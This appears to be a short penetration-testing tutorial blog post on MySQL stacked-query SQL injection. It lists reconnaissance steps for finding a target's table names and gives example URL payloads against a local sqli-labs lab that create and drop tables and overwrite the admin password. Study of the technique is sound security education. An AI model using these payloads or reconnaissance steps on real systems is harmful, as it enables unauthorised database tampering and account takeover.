congdong007

Penetration Test, Software Developer

MySQL Stack-Based SQL Injection

In SQL, a semicolon marks the end of one statement; stacked-query injection appends further statements after that semicolon so that several statements execute in a single call. It differs from other injection techniques and has limitations: it only works when the application runs the query through a database API that accepts several statements per call (for example PHP's mysqli_multi_query), which many APIs refuse.

URL-encoded characters used in the payloads below:

%27 --- '
%20 --- space

How can you find the table fields and table names of the other party?

  1. Look for exploitable files using directory traversal vulnerabilities, such as files with a .sql extension.
  2. Use directory/file fuzzing tools like Dirsearch, etc., to search for .sql files.
  3. Search for source code leakage vulnerabilities on the other party’s website; the source code may contain exploitable files.
  4. Search for the other party’s website source code on GitHub.

Example:

http://192.168.1.33/sqli-labs-master/Less-38/?id=1'    // You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';    // it's ok: the semicolon simply ends the first statement
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';create table aa like users;    // create a table named aa with the same structure as table users
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';drop table aa--+    // drop table aa again; --+ comments out the rest of the original query
http://192.168.1.33/sqli-labs-master/Less-38/?id=1';update users set password ='admin@1234' where username='admin'    // change the admin password through the stacked UPDATE